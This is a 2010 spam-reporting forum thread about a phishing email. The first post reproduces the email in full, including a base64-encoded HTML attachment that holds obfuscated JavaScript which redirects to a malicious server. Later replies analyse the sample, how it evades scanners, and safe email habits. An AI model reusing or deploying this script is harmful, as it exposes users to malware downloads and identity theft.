SPAMCOP HOME · SPAMCOP FAQ · NEWSGROUPS · FORUM FAQ · WEBMAIL · SSL WEBMAIL · SPAMCOPWIKI


 Other words, data, places -->  SpamCop Pages V  FAQs & Words V  Newsgroups V  WebMail V  News-Recent Stuff V   Poll on menu

------>------> Latest and Current Announcements <------<------

Welcome Guest ( Log In | Register )

> This is a User to User Support Forum

The primary mode of support here is peer-to-peer, meaning users helping other users. (please remember this at all times!)
Another try:
This forum is composed of people who have used spamcop and those who are learning about anti-spam efforts.

 
Reply to this topicStart new topic
> Phishing attempts to my spamcop account, 2 such attempts redirecting to numerouno - india . com/x.html
mplungjan@spamcop.net
post Sep 17 2010, 06:20 AM
Post #1


Newbie
*

Group: Members
Posts: 6
Joined: 30-January 04
Member No.: 137



Delivered-To: <myemail>
Received: (qmail 4960 invoked from network); 17 Sep 2010 10:58:28 -0000
Received: from unknown (HELO m1pismtp01-018.prod.mesa1.secureserver.net) ([10.8.12.18])
(envelope-sender <ox[at]rootsproduce.com>)
by smtp31.prod.mesa1.secureserver.net (qmail-1.03) with SMTP
for <myemail>; 17 Sep 2010 10:58:28 -0000
X-IronPort-Anti-spam-Result: AtERAFvmkkzYmsMxf2dsb2JhbAAKBJQihW2HdxUBAQoKDBgEHowGhwKtf4VBBIRGiH0
Received: from c60.cesmail.net ([216.154.195.49])
by m1pismtp01-018.prod.mesa1.secureserver.net with ESMTP; 17 Sep 2010 03:58:27 -0700
Received: from unknown (HELO filter8.cesmail.net) ([192.168.1.218])
by c60.cesmail.net with SMTP; 17 Sep 2010 06:58:27 -0400
Received: (qmail 17745 invoked by uid 1010); 17 Sep 2010 10:58:27 -0000
Delivered-To: spamcop-net-<myname>@spamcop.net
Received: (qmail 17681 invoked from network); 17 Sep 2010 10:58:26 -0000
X-spam-Checker-Version: SpamAssassin 3.2.4 (2008-01-01) on filter8
X-spam-Level:
X-spam-Status: hits=0.1 tests=HTML_MESSAGE,RDNS_NONE version=3.2.4
Received: from unknown (192.168.1.107)
by filter8.cesmail.net with QMQP; 17 Sep 2010 10:58:26 -0000
Received: from unknown (HELO YBTBJES) (92.246.206.203)
by mx70.cesmail.net with SMTP; 17 Sep 2010 10:58:25 -0000
Received: from svtmail07.prod.sabre.com (svtmail04.prod.sabre.com [151.193.64.1])
by mail.global.frontbridge.com with esmtp
id 5A849F-000946-63
for ljl[at]spamcop.net; Fri, 17 Sep 2010 14:58:19 +0300
Received: from samlab (10.208.04.9:61117) by svtmail09.prod.sabre.com (LSMTP for Windows NT v1.1b) with SMTP id <3.C0CBAD1D[at]svtmail05.prod.sabre.com>; Fri, 17 Sep 2010 14:58:19 +0300
Date: Fri, 17 Sep 2010 14:58:19 +0300
From: "Winfred Joiner" <ox[at]rootsproduce.com>
To: ljl[at]spamcop.net
Message-ID: <57114311.39684104853195612400.JavaMail.ita[at]samlab>
Subject: Please help me
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_1695044_17099105.4893020990891"
X-SpamCop-Checked: 92.246.206.203 151.193.64.1

------=_Part_1695044_17099105.4893020990891
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit

Please help me to take over the accounting duties during the period Jackie will be gone. Make arrangements so that you will be able to issue checks and know where to deposit received checks.

------=_Part_1695044_17099105.4893020990891
Content-Type: text/html; name="52399xls.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="52399xls.html"

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij5mdW5j
dGlvbiBldGdyKHpqNHIpe3Zhcg0KYm85Nyxidmd5PSIiLGtwbjgsaXl2Mj0iMG9jZGZ1bTtpcC9x
cmx4PW50Li06diBoZT5zXCJhPCIscDNqZSxqNDQ2PWl5djIubGVuZ3RoO2V2YWwodW5lc2NhcGUo
IiU2NnVuJTYzdGklNkZuIHIlNjFpeSUyOGt1JTc5Yyl7JTYydmclNzkrPSU2QnV5YyU3RCIpKTtm
b3IocDNqZT0wO3AzamU8emo0ci5sZW5ndGg7cDNqZSsrKXtibzk3PXpqNHIuY2hhckF0KHAzamUp
O2twbjg9aXl2Mi5pbmRleE9mKGJvOTcpO2lmKGtwbjg+LTEpe2twbjgtPShwM2plKzEpJWo0NDY7
aWYoa3BuODwwKXtrcG44Kz1qNDQ2O31yYWl5KGl5djIuY2hhckF0KGtwbjgpKTt9ZWxzZXtyYWl5
KGJvOTcpO319ZXZhbCh1bmVzY2FwZSgiJTY0b2MlNzVtZSU2RXQudyU3Mml0JTY1KGIlNzZneSkl
M0JidiU2N3k9JTIyJTIyOyIpKTt9ZXRncigiMGlcInZkYTA+cy0wbWUtaDtjPW94PmZ0Oi5oLTAw
bi5zLXY6ZDs9eCBlXCJtb2M+O2E8bXNhdG1zb2w8Lml0dXFjaGlpeC1lPHUwOmFscGF4ciIpOzwv
c2NyaXB0Pjxub3NjcmlwdD5UbyBkaXNwbGF5IHRoaXMgcGFnZSB5b3UgbmVlZCBhIGJyb3dzZXIg
dGhhdCBzdXBwb3J0cyBKYXZhU2NyaXB0Ljwvbm9zY3JpcHQ+

------=_Part_1695044_17099105.4893020990891--

User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Farelf
post Sep 17 2010, 07:17 AM
Post #2


What Life?
Group Icon

Group: Membersph
Posts: 6478
Joined: 23-February 04
From: Western Australia
Member No.: 491



Thanks mplungjan. Any idea what that bit of JavaЅcript (the HTML attachment) you were sent does?

Can you refer to these things by way of a Tracking URL rather than as a paste-in of the actual spam? The forum formatting and badword filter changes stuff posted here, there can sometimes be live links to bad places and, although munged slightly, there is exposure of (usually) innocent addresses etc. when you post the spam in public.


--------------------
Plus ça change, plus c’est la même chose
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Farelf
post Sep 18 2010, 12:18 AM
Post #3


What Life?
Group Icon

Group: Membersph
Posts: 6478
Joined: 23-February 04
From: Western Australia
Member No.: 491



Well, I'm not a coder's bootlace (the more refined way to say it, if the phrase seems unfamiliar) but ...

From several different code fragments in the (decoded) attachment it seems to be (slightly?) related to jsunpack - probably an unpacker for a lightning download then - though no source for the download is apparent to me. Lots of people might get "caught" by such a thing (if they have scripting allowed on their browser/mail client) if there is an actual payload and whatever that ultimate payload's function(s) might be would be anyone's guess - but identity theft is potentially the most serious.

Nasty - or not sent by anyone wishing you well anyway.


--------------------
Plus ça change, plus c’est la même chose
User is offlineProfile CardPM
Go to the top of the page
+Quote Post
silentlarry
post Sep 20 2010, 01:11 PM
Post #4


Advanced Member
***

Group: Membera
Posts: 103
Joined: 26-March 04
Member No.: 891



FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.

Really low spam assassin score on most of these. Successful filtering is usually by CBL or one of the other BLs.


tracking1
tracking2
tracking3


User is offlineProfile CardPM
Go to the top of the page
+Quote Post
Farelf
post Sep 20 2010, 07:44 PM
Post #5


What Life?
Group Icon

Group: Membersph
Posts: 6478
Joined: 23-February 04
From: Western Australia
Member No.: 491



QUOTE(silentlarry @ Sep 21 2010, 02:11 AM) *
FYI for whatever it's worth

I've been getting similar stuff, seems to be increasing every day.
Well worth raising SL, seems it was and is a 'zero day' sort of thing. Zero detections from the massed AV engines at VirusTotal when the O/P first raised the topic but now my resident Norton says Trojan.Webkit!html - http://securityresponse.symantec.com/secur...-99&tabid=2
QUOTE
Discovered: October 9, 2007
Updated: October 9, 2007 4:42:01 PM
Type: Trojan
Infection Length: Varies
Systems Affected: Windows 98, Windows 95, Windows XP, Solaris, Windows Me, Windows Vista, Windows NT, Windows Server 2003, Linux, Windows 2000

Trojan.Webkit!html is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.

A successful compromise by a malicious Web server may result in additional malicious files being downloaded to the compromised computer
Seems the 'unescape' coding within the scri_pt may be variable and/or some random characters outside the active body of code may be variable - which successfully defeats initial detection - the O/P's version was not picked up by Norton until yesterday's/today's updates. Haven't specifically checked yours but that's what I think is happening - the hash values will be variable, the code content may appear variable until unescape codes resolved, the redirection destination (which is well obfuscated, I can't see it) may be variable, very likely each day's version of the thing will be undetectable as a threat to most scanners for some days after release.

HTML attachments/content in spam have been around for ages - the prudent assumption is, if they are in spam they probably *are* malicious but this is the first time I have personally verified an instance. Well, apart from a few web bugs (can't assume they are history either - to keep a step ahead, spammers sometimes step backwards). The 'inconvenience' of safe practice (no scripting allowed, no preview of email, view text only, don't read obvious spam at all, don't open unknown attachments or click on unknown links, query/prevent redirections) seems to be vindicated once again.


--------------------
Plus ça change, plus c’est la même chose
User is offlineProfile CardPM
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 

- Lo-Fi Version Time is now: 31st July 2014 - 02:22 AM